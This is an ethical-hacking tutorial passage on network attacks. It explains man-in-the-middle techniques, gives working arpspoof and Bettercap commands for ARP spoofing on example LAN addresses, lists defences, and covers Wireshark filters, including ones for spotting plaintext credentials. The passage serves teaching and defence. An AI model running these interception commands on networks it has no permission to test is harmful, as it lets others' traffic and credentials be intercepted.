Network Attacks

Network attacks target the communication infrastructure that connects systems. Understanding these attacks is essential for ethical hackers, as network-level vulnerabilities can expose all data in transit and enable access to systems that are otherwise well-secured at the application level.

---

Man-in-the-Middle (MITM) Attacks

A MITM attack intercepts communication between two parties without their knowledge:

Normal Communication:
Client ←────────────────→ Server

MITM Attack:
Client ←───→ Attacker ←───→ Server
         (intercepts and
          relays traffic)

MITM Attack Types

Attack	Description	Layer
ARP Spoofing	Poison the ARP cache to redirect traffic	Layer 2
DNS Spoofing	Return forged DNS responses	Layer 7
DHCP Spoofing	Act as a rogue DHCP server	Layer 2/3
SSL Stripping	Downgrade HTTPS to HTTP	Layer 4/7
Evil Twin	Create a rogue Wi-Fi access point	Layer 1/2

---

ARP Spoofing

The Address Resolution Protocol (ARP) maps IP addresses to MAC addresses. ARP has no authentication, making it trivially exploitable:

How It Works

1. Attacker sends forged ARP replies to the victim
2. Victim's ARP cache maps the gateway's IP to the attacker's MAC
3. All traffic intended for the gateway flows through the attacker
4. Attacker forwards traffic to the real gateway (remaining invisible)

Using arpspoof

# Enable IP forwarding (so traffic is relayed)
echo 1 > /proc/sys/net/ipv4/ip_forward

# Spoof ARP — tell the victim that we are the gateway
arpspoof -i eth0 -t 192.168.1.100 192.168.1.1

# Spoof ARP — tell the gateway that we are the victim
arpspoof -i eth0 -t 192.168.1.1 192.168.1.100

Using Bettercap

# Start Bettercap
bettercap -iface eth0

# Enable ARP spoofing
> set arp.spoof.targets 192.168.1.100
> arp.spoof on

# Enable packet sniffing
> net.sniff on

Detection and Prevention

Defence	Description
Static ARP entries	Manually set ARP entries for critical systems
Dynamic ARP Inspection (DAI)	Switch-level ARP validation
ARP monitoring tools	arpwatch, XArp
Encryption	HTTPS, VPN, SSH tunnel all traffic

---

Packet Sniffing with Wireshark

Wireshark is the world's leading network protocol analyser:

Capture Filters

# Capture only traffic to/from a specific host
host 192.168.1.100

# Capture only HTTP traffic
port 80

# Capture only traffic on a specific subnet
net 192.168.1.0/24

Display Filters

Filter	Purpose
http	Show only HTTP traffic
http.request.method == "POST"	Show only POST requests
tcp.port == 443	Show HTTPS traffic
dns	Show DNS queries and responses
ftp	Show FTP traffic (often contains plaintext credentials)
tcp.flags.syn == 1	Show TCP SYN packets (new connections)
ip.addr == 192.168.1.100	Filter by IP address

Extracting Credentials

Unencrypted protocols transmit credentials in plaintext: